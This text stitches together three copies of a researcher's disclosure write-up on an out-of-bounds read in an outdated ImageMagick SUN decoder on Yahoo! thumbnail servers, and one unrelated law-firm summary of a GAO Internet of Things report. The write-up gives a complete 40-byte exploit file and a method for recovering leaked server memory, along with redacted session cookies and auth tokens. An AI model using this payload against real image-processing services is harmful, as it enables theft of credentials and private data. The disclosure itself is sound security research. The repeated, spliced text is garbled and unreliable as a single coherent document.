*bleed, more powerful: dumping Yahoo! authentication secrets with an out-of-bounds read

Overview

In my previous post on Yahoobleed #1 (YB1), we saw how an uninitialized memory vulnerability could lead to disclosure of private images belonging to other users. The resulting leaked memory bytes were subject to JPEG compression, which is not a problem for image theft, but is somewhat lacking if we wanted to steal memory content other than images.

In this post, we explore an alternative *bleed class vulnerability in Yahoo! thumbnailing servers. Let's call it Yahoobleed #2 (YB2). We'll get around the (still present) JPEG compression issue to exfiltrate raw memory bytes. With subsequent usage of the elite cyberhacking tool "strings", we discover many wonders.

Yahoo! fixed YB2 at the same time as YB1, by retiring ImageMagick. See my previous post for a more detailed list of why Yahoo! generally hit this out of the park with their response.

Visualization


The above patch of noise is a PNG (i.e lossless) and zoomed rendering of a 64x4 subsection of a JPEG image returned from Yahoo! servers when we trigger the vulnerability.

There are many interesting things to note about this image, but for now we'll observe that... is that a couple of pointers we see at the top?? I have a previous Project Zero post about pointer visualization and once you've seen a few pointers, it gets pretty easy to spot them across a variety of leak situations. Well, at least for Linux x86_64, where pointers often have a common prefix of 0x00007f. The hallmarks of the pointers above are:
  • Repeating similar structures with the same alignment (8 bytes on 64-bit).
  • In blocks of pointers, vertical stripes of white towards where the most significant bytes are aligned, representing 0x00. (Note that the format of the leaked bytes is essentially "negated" because of the input file format.)
  • Again in blocks of pointers, vertical stripes of black next to that, representing 7 bits set in a row of the 0x7f value.
  • And again in blocks of pointers, a thin vertical stripe of white next to that, representing the 1 bit not set in the 0x7f value.
But we still see JPEG compression artifacts. Will that be a problem for precise byte-by-byte data exfiltration? We'll get to it later.

The vulnerability

The hunt for this vulnerability starts with the realization that we don't know if Yahoo! is running an uptodate ImageMagick or not. Given that we know Yahoo! supports the RLE format, perhaps we can use the same techniques outlined in my previous post about memory corruption in Box.com? Interestingly enough, the crash file doesn't seem to crash anything but all the test files do seem to render instead of failing cleanly as would be expected with an uptodate ImageMagick. After some pondering, the most likely explanation is that the Yahoo! ImageMagick is indeed old and vulnerable, but the different heap setup we learned out about with YB1 means that the out-of-bounds heap write test case has no effect due to alignment slop.

To test this hypothesis, we make an out-of-bounds heap write RLE file that substantially overflows a smaller chunk (64 bytes, with a 16 byte or so overflow), and upload that to Yahoo!
And sure enough, hitting the thumbnail fetch URL fairly reliably (50% or so) results in:

This looks like a very significant backend failure, and our best guess is a SIGSEGV due to the presence of the 2+ years old RLE memory corruption issue.

But our goal today is not to exploit an RCE memory corruption, although that would be fun. Our goal is to exfiltrate data with a *bleed attack. So, we have an ImageMagick that is about 2.5 years old. In that timeframe, surely lots of other interesting vulnerabilities have been fixed? After a bit of looking around, we settle on an interesting candidate: this 2+ years old out-of-bounds fix in the SUN decoder. The bug fix appears to be taking a length check and applying it more thoroughly so that it includes images with a bit depth of 1. Looking at the code slightly before this patch, and tracing through the decode path for an image with a bit depth of 1, we get (coders/sun.c):

    sun_info.width=ReadBlobMSBLong(image);
    sun_info.height=ReadBlobMSBLong(image);
    sun_info.depth=ReadBlobMSBLong(image);
    sun_info.length=ReadBlobMSBLong(image);
[...]
    number_pixels=(MagickSizeType) image->columns*image->rows;
    if ((sun_info.type != RT_ENCODED) && (sun_info.depth >= 8) &&
        ((number_pixels*((sun_info.depth+7)/8)) > sun_info.length))
      ThrowReaderException(CorruptImageError,"ImproperImageHeader");
    bytes_per_line=sun_info.width*sun_info.depth;
    sun_data=(unsigned char *) AcquireQuantumMemory((size_t) sun_info.length,
      sizeof(*sun_data));
[...]
    count=(ssize_t) ReadBlob(image,sun_info.length,sun_data);
    if (count != (ssize_t) sun_info.length)
      ThrowReaderException(CorruptImageError,"UnableToReadImageData");

    sun_pixels=sun_data;
    bytes_per_line=0;
[...]
    p=sun_pixels;
    if (sun_info.depth == 1)
      for (y=0; y < (ssize_t) image->rows; y++)
      {
        q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
        if (q == (Quantum *) NULL)
          break;
        for (x=0; x < ((ssize_t) image->columns-7); x+=8)
        {
          for (bit=7; bit >= 0; bit--)
          {
            SetPixelIndex(image,(Quantum) ((*p) & (0x01 << bit) ? 0x00 : 0x01),
              q);
            q+=GetPixelChannels(image);
          }
          p++;
        }

So in the case of an image with a depth of 1, we see a fairly straightforward problem:
  • Let's say we have width=256, height=256, depth=1, length=8.
  • Image of depth 1 bypasses check of number_pixels against sun_info.length.
  • sun_data is allocated to be a buffer of 8 bytes, and 8 bytes are read from the input file.
  • Decode of 1 bit per pixel image proceeds. (256*256)/8 == 8192 bytes are required in sun_data but only 8 are present.
  • Massive out-of-bounds read ensues; rendered image is based largely on out-of-bounds memory.

The exploit

The exploit SUN file is only 40 bytes, so we might as well show a gratuitous screenshot of the file in a hex editor, and then dissect the exact meaning of each byte:


59 A6 6A 95:             header
00 00 01 00 00 00 01 00: image dimensions 256 x 256
00 00 00 01:             image depth 1 bit per pixel
00 00 00 08:             image data length 8
00 00 00 01:             image type 1: standard
00 00 00 00 00 00 00 00: map type none, length 0
41 41 41 41 41 41 41 41: 8 bytes of image data

The most interesting variable we can twiddle in this exploit file is the image data length. As long as we keep it smaller than (256 * 256) / 8, we'll get the out of bounds read. But where will this out of bounds read start? It will start from the end of the allocation of the image data. By changing the size of the image data, we may end up occupying different relative locations within the heap area (perhaps more towards the beginning or end with certain sizes). This flexibility gives us a greater chance of being able to read something interesting.

Exfiltration

Exfiltration is where the true usefulness of this exploit becomes apparent. As noted above in the vizualization section, the result of our exfiltration attempt is a JPEG compressed file. We actually get a greyscale JPEG image out of ImageMagick, since the 1 bit per pixel SUN file generates a black and white drawing. A greyscale JPEG is a good start for reliable exfiltration, because JPEG compression is designed to hack human perception. Human visualization is more sensitive to color brightness than it is to actual color, so color data is typically compressed more lossily than brightness data. (This is achieved via the YCbCr colorspace.) But with greyscale JPEGs there is only brightness.

But looking at the exfiltrated JPEG image above, we still see JPEG compression artifacts. Are we doomed? Actually, no. Since our SUN image was chosen to be a 1 bit per pixel (black or white) image, then we only need to preserve 1 bit of accurate entropy per pixel in the exfiltrated JPEG file! Although some of the white pixels are a little bit light grey instead of fully white, and some of the black pixels are a little bit dark grey instead of fully black, each pixel is still very close to black or white. I don't have a mathematical proof of course, but it appears that for the level of JPEG compression used by the Yahoo! servers, every pixel has its 1 bit of entropy intact. The most deviant pixels from white still appear to be about 85% white (i.e. very light grey) whereas the threshold for information loss would of course be 50% or below.

We can attempt to recover raw bytes from the JPEG file with an ImageMagick conversion command like this:

convert yahoo_file.jpg -threshold 50% -depth 1 -negate out.gray

For the JPEG file at the top of this post, the resulting recovered original raw memory bytes are:

0000000 d0 f0 75 9b 83 7f 00 00 50 33 76 9b 83 7f 00 00
0000020 31 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00

Those pointers, 0x00007f839b75f0d0 and 0x00007f839b763350, look spot on.

The strings and secrets

So now that we have a reliable and likely byte perfect exfiltration primitive, what are some interesting strings in the memory space of the Yahoo! thumbnail server? With appropriate redactions representing long high entropy strings,

SSLCOOKIE: SSL=v=1&s=redacted&kv=0

Yahoo-App-Auth: v=1;a=yahoo.mobstor.client.mailtsusm2.prod;h=10.210.245.245;t=redacted;k=4;s=redacted

https://dl-mail.ymail.com/ws/download/mailboxes/@.id==redacted/messages/@.id==redacted/content/parts/@.id==2/raw?appid=getattachment&token=redacted&ymreqid=redacted

Yeah, it's looking pretty serious.

In terms of interesting strings other than session secrets, etc., what else did we see? Well, most usefully, there's some paths, error messages and versions strings that would appear to offer a very precise determination that indeed, ImageMagick is here and indeed, it is dangerously old:

/usr/lib64/ImageMagick-6.8.9/modules-Q16/coders/sun.so
ImageMagick 6.8.9-6 Q16 x86_64 2014-07-25 http://www.imagemagick.org
unrecognized PerlMagick method

Obviously, these strings made for a much more convincing bug report. Also note the PerlMagick reference. I'm not familiar with PerlMagick but perhaps PerlMagick leads to an in-process ImageMagick, which is why our out-of-bounds image data reads can read so much interesting stuff.

Conclusion

This was fun. We found a leak that encoded only a small amount of data per JPEG compressed pixel returned to us, allowing us to reliably reconstruct original bytes of exfiltrated server memory.

The combination of running an ImageMagick that is both old and also unrestricted in the enabled decoders is dangerous. The fix of retiring ImageMagick should take care of both those issues :)


*bleed, more powerful: dumping Yahoo! authentication secrets with an out-of-bounds read

Overview

In my previous post on Yahoobleed #1 (YB1), we saw how an uninitialized memory vulnerability could lead to disclosure of private images belonging to other users. The resulting leaked memory bytes were subject to JPEG compression, which is not a problem for image theft, but is somewhat lacking if we wanted to steal memory content other than images.

In this post, we explore an alternative *bleed class vulnerability in Yahoo! thumbnailing servers. Let's call it Yahoobleed #2 (YB2). We'll get around the (still present) JPEG compression issue to exfiltrate raw memory bytes. With subsequent usage of the elite cyberhacking tool "strings", we discover many wonders.

Yahoo! fixed YB2 at the same time as YB1, by retiring ImageMagick. See my previous post for a more detailed list of why Yahoo! generally hit this out of the park with their response.

Visualization


The above patch of noise is a PNG (i.e lossless) and zoomed rendering of a 64x4 subsection of a JPEG image returned from Yahoo! servers when we trigger the vulnerability.

There are many interesting things to note about this image, but for now we'll observe that... is that a couple of pointers we see at the top?? I have a previous Project Zero post about pointer visualization and once you've seen a few pointers, it gets pretty easy to spot them across a variety of leak situations. Well, at least for Linux x86_64, where pointers often have a common prefix of 0x00007f. The hallmarks of the pointers above are:
  • Repeating similar structures with the same alignment (8 bytes on 64-bit).
  • In blocks of pointers, vertical stripes of white towards where the most significant bytes are aligned, representing 0x00. (Note that the format of the leaked bytes is essentially "negated" because of the input file format.)
  • Again in blocks of pointers, vertical stripes of black next to that, representing 7 bits set in a row of the 0x7f value.
  • And again in blocks of pointers, a thin vertical stripe of white next to that, representing the 1 bit not set in the 0x7f value.
But we still see JPEG compression artifacts. Will that be a problem for precise byte-by-byte data exfiltration? We'll get to it later.

The vulnerability

The hunt for this vulnerability starts with the realization that we don't know if Yahoo! is running an uptodate ImageMagick or not. Given that we know Yahoo! supports the RLE format, perhaps we can use the same techniques outlined in my previous post about memory corruption in Box.com? Interestingly enough, the crash file doesn't seem to crash anything but all the test files do seem to render instead of failing cleanly as would be expected with an uptodate ImageMagick. After some pondering, the most likely explanation is that the Yahoo! ImageMagick is indeed old and vulnerable, but the different heap setup we learned out about with YB1 means that the out-of-bounds heap write test case has no effect due to alignment slop.

To test this hypothesis, we make an out-of-bounds heap write RLE file that substantially overflows a smaller chunk (64 bytes, with a 16 byte or so overflow), and upload that to Yahoo!
And sure enough, hitting the thumbnail fetch URL fairly reliably (50% or so) results in:

This looks like a very significant backend failure, and our best guess is a SIGSEGV due to the presence of the 2+ years old RLE memory corruption issue.

But our goal today is not to exploit an RCE memory corruption, although that would be fun. Our goal is to exfiltrate data with a *bleed attack. So, we have an ImageMagick that is about 2.5 years old. In that timeframe, surely lots of other interesting vulnerabilities have been fixed? After a bit of looking around, we settle on an interesting candidate: this 2+ years old out-of-bounds fix in the SUN decoder. The bug fix appears to be taking a length check and applying it more thoroughly so that it includes images with a bit depth of 1. Looking at the code slightly before this patch, and tracing through the decode path for an image with a bit depth of 1, we get (coders/sun.c):

    sun_info.width=ReadBlobMSBLong(image);
    sun_info.height=ReadBlobMSBLong(image);
    sun_info.depth=ReadBlobMSBLong(image);
    sun_info.length=ReadBlobMSBLong(image);
[...]
    number_pixels=(MagickSizeType) image->columns*image->rows;
    if ((sun_info.type != RT_ENCODED) && (sun_info.depth >= 8) &&
        ((number_pixels*((sun_info.depth+7)/8)) > sun_info.length))
      ThrowReaderException(CorruptImageError,"ImproperImageHeader");
    bytes_per_line=sun_info.width*sun_info.depth;
    sun_data=(unsigned char *) AcquireQuantumMemory((size_t) sun_info.length,
      sizeof(*sun_data));
[...]
    count=(ssize_t) ReadBlob(image,sun_info.length,sun_data);
    if (count != (ssize_t) sun_info.length)
      ThrowReaderException(CorruptImageError,"UnableToReadImageData");

    sun_pixels=sun_data;
    bytes_per_line=0;
[...]
    p=sun_pixels;
    if (sun_info.depth == 1)
      for (y=0; y < (ssize_t) image->rows; y++)
      {
        q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
        if (q == (Quantum *) NULL)
          break;
        for (x=0; x < ((ssize_t) image->columns-7); x+=8)
        {
          for (bit=7; bit >= 0; bit--)
          {
            SetPixelIndex(image,(Quantum) ((*p) & (0x01 << bit) ? 0x00 : 0x01),
              q);
            q+=GetPixelChannels(image);
          }
          p++;
        }

So in the case of an image with a depth of 1, we see a fairly straightforward problem:
  • Let's say we have width=256, height=256, depth=1, length=8.
  • Image of depth 1 bypasses check of number_pixels against sun_info.length.
  • sun_data is allocated to be a buffer of 8 bytes, and 8 bytes are read from the input file.
  • Decode of 1 bit per pixel image proceeds. (256*256)/8 == 8192 bytes are required in sun_data but only 8 are present.
  • Massive out-of-bounds read ensues; rendered image is based largely on out-of-bounds memory.

The exploit

The exploit SUN file is only 40 bytes, so we might as well show a gratuitous screenshot of the file in a hex editor, and then dissect the exact meaning of each byte:


59 A6 6A 95:             header
00 00 01 00 00 00 01 00: image dimensions 256 x 256
00 00 00 01:             image depth 1 bit per pixel
00 00 00 08:             image data length 8
00 00 00 01:             image type 1: standard
00 00 00 00 00 00 00 00: map type none, length 0
41 41 41 41 41 41 41 41: 8 bytes of image data

The most interesting variable we can twiddle in this exploit file is the image data length. As long as we keep it smaller than (256 * 256) / 8, we'll get the out of bounds read. But where will this out of bounds read start? It will start from the end of the allocation of the image data. By changing the size of the image data, we may end up occupying different relative locations within the heap area (perhaps more towards the beginning or end with certain sizes). This flexibility gives us a greater chance of being able to read something interesting.

Exfiltration

Exfiltration is where the true usefulness of this exploit becomes apparent. As noted above in the vizualization section, the result of our exfiltration attempt is a JPEG compressed file. We actually get a greyscale JPEG image out of ImageMagick, since the 1 bit per pixel SUN file generates a black and white drawing. A greyscale JPEG is a good start for reliable exfiltration, because JPEG compression is designed to hack human perception. Human visualization is more sensitive to color brightness than it is to actual color, so color data is typically compressed more lossily than brightness data. (This is achieved via the YCbCr colorspace.) But with greyscale JPEGs there is only brightness.

But looking at the exfiltrated JPEG image above, we still see JPEG compression artifacts. Are we doomed? Actually, no. Since our SUN image was chosen to be a 1 bit per pixel (black or white) image, then we only need to preserve 1 bit of accurate entropy per pixel in the exfiltrated JPEG file! Although some of the white pixels are a little bit light grey instead of fully white, and some of the black pixels are a little bit dark grey instead of fully black, each pixel is still very close to black or white. I don't have a mathematical proof of course, but it appears that for the level of JPEG compression used by the Yahoo! servers, every pixel has its 1 bit of entropy intact. The most deviant pixels from white still appear to be about 85% white (i.e. very light grey) whereas the threshold for information loss would of course be 50% or below.

We can attempt to recover raw bytes from the JPEG file with an ImageMagick conversion command like this:

convert yahoo_file.jpg -threshold 50% -depth 1 -negate out.gray

For the JPEG file at the top of this post, the resulting recovered original raw memory bytes are:

0000000 d0 f0 75 9b 83 7f 00 00 50 33 76 9b 83 7f 00 00
0000020 31 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00

Those pointers, 0x00007f839b75f0d0 and 0x00007f839b763350, look spot on.

The strings and secrets

So now that we have a reliable and likely byte perfect exfiltration primitive, what are some interesting strings in the memory space of the Yahoo! thumbnail server? With appropriate redactions representing long high entropy strings,

SSLCOOKIE: SSL=v=1&s=redacted&kv=0

Yahoo-App-Auth: v=1;a=yahoo.mobstor.client.mailtsusm2.prod;h=10.210.245.245;t=redacted;k=4;s=redacted

https://dl-mail.ymail.com/ws/download/mailboxes/@.id==redacted/messages/@.id==redacted/content/parts/@.id==2/raw?appid=getattachment&token=redacted&ymreqid=redacted

Yeah, it's looking pretty serious.

In terms of interesting strings other than session secrets, etc., what else did we see? Well, most usefully, there's some paths, error messages and versions strings that would appear to offer a very precise determination that indeed, ImageMagick is here and indeed, it is dangerously old:

/usr/lib64/ImageMagick-6.8.9/modules-Q16/coders/sun.so
ImageMagick 6.8.9-6 Q16 x86_64 2014-07-25 http://www.imagemagick.org
unrecognized PerlMagick method

Obviously, these strings made for a much more convincing bug report. Also note the PerlMagick reference. I'm not familiar with PerlMagick but perhaps PerlMagick leads to an in-process ImageMagick, which is why our out-of-bounds image data reads can read so much interesting stuff.

Conclusion

This was fun. We found a leak that encoded only a small amount of data per JPEG compressed pixel returned to us, allowing us to reliably reconstruct original bytes of exfiltrated server memory.

The combination of running an ImageMagick that is both old and also unrestricted in the enabled decoders is dangerous. The fix of retiring ImageMagick should take care of both those issues :)


US Government Accountability Office Releases New Report On The Internet of Things (IoT)

On May 15, 2017, the US Government Accountability Office (GAO) released a new report entitled “Internet of Things: Status and implications of an increasingly connected world.” In the report, the GAO provides an introduction to the Internet of Things (IoT), describes what is known about current and emerging IoT technologies, and examines the implications of their use. The report was prepared by reviewing key reports and scientific literature describing current and developing IoT technologies and their uses, concentrating on consumers, industry, and the public sector, and interviewing agency officials from the Federal Trade Commission (FTC) and Federal Communications Commission (FCC). The GAO also convened a number of expert meetings during the drafting process, bringing together experts from various disciplines, including computer science, security, privacy, law, economics, physics, and product development.

Technological Advancements Leading To IoT Surge

The GAO identified four technological advancements that have contributed to the increase in IoT devices:

  • Miniaturized, inexpensive electronics. According to the GAO, the cost and size of electronics are decreasing, making it easier for the electronics to be embedded into objects and to be enabled as IoT devices. For example, the price of sensors has significantly declined over the past decade. One sensor called an accelerometer cost an average of $2 in 2006. The average price of the unit in 2015 was $.40.
  • Ubiquitous connectivity. The GAO notes that the expansion of networks and decreasing costs allow for easier connectivity, and for IoT devices to be used almost anywhere. The proliferation of Wi-Fi options and Bluetooth creates a more expansive space for IoT to operate.
  • Cloud computing. Cloud computing allows for increased computer processing. Because IoT devices create a large amount of data, they require large amounts of computing power to analyze the data. The increase and availability of cloud computing is helping IoT devices expand.
  • Data analytics. New advanced analytical tools can be used to examine large amounts of data to uncover hidden patterns and correlations. According to the GAO, advanced algorithms in computing systems can enable the automation of data analytics, and allow for valuable information to be collected by IoT devices.

Common Components Of IoT Devices

The GAO identifies three major components that make up nearly all IoT devices: (1) hardware, (2) network connectivity, and (3) software. The hardware used in IoT devices generally consists of embedded components, such as sensors, actuators, and processors. Sensors generally collect information about the IoT environment, such as temperature or changes in motion. Actuators perform physical actions, such as unlocking a door. And processors serve as the “brains” of the IoT device. The network component of an IoT device connects it to other devices and to networked computer systems. And the software in IoT devices perform a range of functions, from basic to complex. These three components are common across the IoT industry, and serve as the bedrock foundation for understanding the security challenges facing the IoT space.

Benefits and Uses

According to the GAO, the benefits and uses of IoT for consumers, industry and the public sector are widespread. From wearable IoT devices, such as fitness trackers, smart watches and smart glasses, to smart homes, buildings and vehicles, IoT is changing the landscape of consumer products and how people interact with their space. IoT is also impacting supply chain and agriculture industries, enhancing productivity and efficiency.

Potential Implications

With these benefits comes potential risk. The GAO report identifies five risk categories presented by the onset of new IoT technology: (1) information security; (2) privacy; (3) safety; (4) standards; and (5) economic issues.

  • Information security. The IoT brings the risks inherent in potentially unsecured information technology systems in homes, factories, and communities. IoT devices, networks, or the cloud servers where they store data can be compromised in a cyberattack.
  • Privacy. Smart devices that monitor public spaces may collect information about individuals without their knowledge or consent.
  • Safety. Researchers have demonstrated that IoT devices, such as connected automobiles and medical devices, can be hacked, potentially endangering the health and safety of their owners.
  • Standards. IoT devices and systems must be able to communicate easily. Technical standards to enable this communication will need to be developed and implemented effectively.
  • Economic issues. While impacts such as positive growth for industries that can use the IoT to reduce costs and provide better services is a beneficial outcome, economic disruption is also possible, such as the need for certain types of businesses and jobs that rely on individual interventions, including assembly line work or commercial vehicle deliveries.

As IoT technology increases, so too will the regulatory landscape governing its use. Although there is no single US federal agency that has overall regulatory responsibility for IoT, various agencies oversee or regulate aspects of the IoT, such as specific sectors, types of devices, or data. If you or your business is operating, or plans to operate in the IoT space, the Dentons’ global Privacy and Cybersecurity group can help you navigate this fast-paced, and shifting environment.

Dentons is the world’s largest law firm, a leader on the Acritas Global Elite Brand Index, a BTI Client Service 30 Award winner, and recognized by prominent business and legal publications for its innovations in client service, including founding Nextlaw Labs and the Nextlaw Global Referral Network. Dentons’ global Privacy and Cybersecurity Group operates at the intersection of technology and law, and was recently singled out as one of the law firms best at cybersecurity by corporate counsel, according to BTI Consulting Group.  

*bleed, more powerful: dumping Yahoo! authentication secrets with an out-of-bounds read

Overview

In my previous post on Yahoobleed #1 (YB1), we saw how an uninitialized memory vulnerability could lead to disclosure of private images belonging to other users. The resulting leaked memory bytes were subject to JPEG compression, which is not a problem for image theft, but is somewhat lacking if we wanted to steal memory content other than images.

In this post, we explore an alternative *bleed class vulnerability in Yahoo! thumbnailing servers. Let's call it Yahoobleed #2 (YB2). We'll get around the (still present) JPEG compression issue to exfiltrate raw memory bytes. With subsequent usage of the elite cyberhacking tool "strings", we discover many wonders.

Yahoo! fixed YB2 at the same time as YB1, by retiring ImageMagick. See my previous post for a more detailed list of why Yahoo! generally hit this out of the park with their response.

Visualization


The above patch of noise is a PNG (i.e lossless) and zoomed rendering of a 64x4 subsection of a JPEG image returned from Yahoo! servers when we trigger the vulnerability.

There are many interesting things to note about this image, but for now we'll observe that... is that a couple of pointers we see at the top?? I have a previous Project Zero post about pointer visualization and once you've seen a few pointers, it gets pretty easy to spot them across a variety of leak situations. Well, at least for Linux x86_64, where pointers often have a common prefix of 0x00007f. The hallmarks of the pointers above are:
  • Repeating similar structures with the same alignment (8 bytes on 64-bit).
  • In blocks of pointers, vertical stripes of white towards where the most significant bytes are aligned, representing 0x00. (Note that the format of the leaked bytes is essentially "negated" because of the input file format.)
  • Again in blocks of pointers, vertical stripes of black next to that, representing 7 bits set in a row of the 0x7f value.
  • And again in blocks of pointers, a thin vertical stripe of white next to that, representing the 1 bit not set in the 0x7f value.
But we still see JPEG compression artifacts. Will that be a problem for precise byte-by-byte data exfiltration? We'll get to it later.

The vulnerability

The hunt for this vulnerability starts with the realization that we don't know if Yahoo! is running an uptodate ImageMagick or not. Given that we know Yahoo! supports the RLE format, perhaps we can use the same techniques outlined in my previous post about memory corruption in Box.com? Interestingly enough, the crash file doesn't seem to crash anything but all the test files do seem to render instead of failing cleanly as would be expected with an uptodate ImageMagick. After some pondering, the most likely explanation is that the Yahoo! ImageMagick is indeed old and vulnerable, but the different heap setup we learned out about with YB1 means that the out-of-bounds heap write test case has no effect due to alignment slop.

To test this hypothesis, we make an out-of-bounds heap write RLE file that substantially overflows a smaller chunk (64 bytes, with a 16 byte or so overflow), and upload that to Yahoo!
And sure enough, hitting the thumbnail fetch URL fairly reliably (50% or so) results in:

This looks like a very significant backend failure, and our best guess is a SIGSEGV due to the presence of the 2+ years old RLE memory corruption issue.

But our goal today is not to exploit an RCE memory corruption, although that would be fun. Our goal is to exfiltrate data with a *bleed attack. So, we have an ImageMagick that is about 2.5 years old. In that timeframe, surely lots of other interesting vulnerabilities have been fixed? After a bit of looking around, we settle on an interesting candidate: this 2+ years old out-of-bounds fix in the SUN decoder. The bug fix appears to be taking a length check and applying it more thoroughly so that it includes images with a bit depth of 1. Looking at the code slightly before this patch, and tracing through the decode path for an image with a bit depth of 1, we get (coders/sun.c):

    sun_info.width=ReadBlobMSBLong(image);
    sun_info.height=ReadBlobMSBLong(image);
    sun_info.depth=ReadBlobMSBLong(image);
    sun_info.length=ReadBlobMSBLong(image);
[...]
    number_pixels=(MagickSizeType) image->columns*image->rows;
    if ((sun_info.type != RT_ENCODED) && (sun_info.depth >= 8) &&
        ((number_pixels*((sun_info.depth+7)/8)) > sun_info.length))
      ThrowReaderException(CorruptImageError,"ImproperImageHeader");
    bytes_per_line=sun_info.width*sun_info.depth;
    sun_data=(unsigned char *) AcquireQuantumMemory((size_t) sun_info.length,
      sizeof(*sun_data));
[...]
    count=(ssize_t) ReadBlob(image,sun_info.length,sun_data);
    if (count != (ssize_t) sun_info.length)
      ThrowReaderException(CorruptImageError,"UnableToReadImageData");

    sun_pixels=sun_data;
    bytes_per_line=0;
[...]
    p=sun_pixels;
    if (sun_info.depth == 1)
      for (y=0; y < (ssize_t) image->rows; y++)
      {
        q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
        if (q == (Quantum *) NULL)
          break;
        for (x=0; x < ((ssize_t) image->columns-7); x+=8)
        {
          for (bit=7; bit >= 0; bit--)
          {
            SetPixelIndex(image,(Quantum) ((*p) & (0x01 << bit) ? 0x00 : 0x01),
              q);
            q+=GetPixelChannels(image);
          }
          p++;
        }

So in the case of an image with a depth of 1, we see a fairly straightforward problem:
  • Let's say we have width=256, height=256, depth=1, length=8.
  • Image of depth 1 bypasses check of number_pixels against sun_info.length.
  • sun_data is allocated to be a buffer of 8 bytes, and 8 bytes are read from the input file.
  • Decode of 1 bit per pixel image proceeds. (256*256)/8 == 8192 bytes are required in sun_data but only 8 are present.
  • Massive out-of-bounds read ensues; rendered image is based largely on out-of-bounds memory.

The exploit

The exploit SUN file is only 40 bytes, so we might as well show a gratuitous screenshot of the file in a hex editor, and then dissect the exact meaning of each byte:


59 A6 6A 95:             header
00 00 01 00 00 00 01 00: image dimensions 256 x 256
00 00 00 01:             image depth 1 bit per pixel
00 00 00 08:             image data length 8
00 00 00 01:             image type 1: standard
00 00 00 00 00 00 00 00: map type none, length 0
41 41 41 41 41 41 41 41: 8 bytes of image data

The most interesting variable we can twiddle in this exploit file is the image data length. As long as we keep it smaller than (256 * 256) / 8, we'll get the out of bounds read. But where will this out of bounds read start? It will start from the end of the allocation of the image data. By changing the size of the image data, we may end up occupying different relative locations within the heap area (perhaps more towards the beginning or end with certain sizes). This flexibility gives us a greater chance of being able to read something interesting.

Exfiltration

Exfiltration is where the true usefulness of this exploit becomes apparent. As noted above in the vizualization section, the result of our exfiltration attempt is a JPEG compressed file. We actually get a greyscale JPEG image out of ImageMagick, since the 1 bit per pixel SUN file generates a black and white drawing. A greyscale JPEG is a good start for reliable exfiltration, because JPEG compression is designed to hack human perception. Human visualization is more sensitive to color brightness than it is to actual color, so color data is typically compressed more lossily than brightness data. (This is achieved via the YCbCr colorspace.) But with greyscale JPEGs there is only brightness.

But looking at the exfiltrated JPEG image above, we still see JPEG compression artifacts. Are we doomed? Actually, no. Since our SUN image was chosen to be a 1 bit per pixel (black or white) image, then we only need to preserve 1 bit of accurate entropy per pixel in the exfiltrated JPEG file! Although some of the white pixels are a little bit light grey instead of fully white, and some of the black pixels are a little bit dark grey instead of fully black, each pixel is still very close to black or white. I don't have a mathematical proof of course, but it appears that for the level of JPEG compression used by the Yahoo! servers, every pixel has its 1 bit of entropy intact. The most deviant pixels from white still appear to be about 85% white (i.e. very light grey) whereas the threshold for information loss would of course be 50% or below.

We can attempt to recover raw bytes from the JPEG file with an ImageMagick conversion command like this:

convert yahoo_file.jpg -threshold 50% -depth 1 -negate out.gray

For the JPEG file at the top of this post, the resulting recovered original raw memory bytes are:

0000000 d0 f0 75 9b 83 7f 00 00 50 33 76 9b 83 7f 00 00
0000020 31 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00

Those pointers, 0x00007f839b75f0d0 and 0x00007f839b763350, look spot on.

The strings and secrets

So now that we have a reliable and likely byte perfect exfiltration primitive, what are some interesting strings in the memory space of the Yahoo! thumbnail server? With appropriate redactions representing long high entropy strings,

SSLCOOKIE: SSL=v=1&s=redacted&kv=0

Yahoo-App-Auth: v=1;a=yahoo.mobstor.client.mailtsusm2.prod;h=10.210.245.245;t=redacted;k=4;s=redacted

https://dl-mail.ymail.com/ws/download/mailboxes/@.id==redacted/messages/@.id==redacted/content/parts/@.id==2/raw?appid=getattachment&token=redacted&ymreqid=redacted

Yeah, it's looking pretty serious.

In terms of interesting strings other than session secrets, etc., what else did we see? Well, most usefully, there's some paths, error messages and versions strings that would appear to offer a very precise determination that indeed, ImageMagick is here and indeed, it is dangerously old:

/usr/lib64/ImageMagick-6.8.9/modules-Q16/coders/sun.so
ImageMagick 6.8.9-6 Q16 x86_64 2014-07-25 http://www.imagemagick.org
unrecognized PerlMagick method

Obviously, these strings made for a much more convincing bug report. Also note the PerlMagick reference. I'm not familiar with PerlMagick but perhaps PerlMagick leads to an in-process ImageMagick, which is why our out-of-bounds image data reads can read so much interesting stuff.

Conclusion

This was fun. We found a leak that encoded only a small amount of data per JPEG compressed pixel returned to us, allowing us to reliably reconstruct original bytes of exfiltrated server memory.

The combination of running an ImageMagick that is both old and also unrestricted in the enabled decoders is dangerous. The fix of retiring ImageMagick should take care of both those issues :)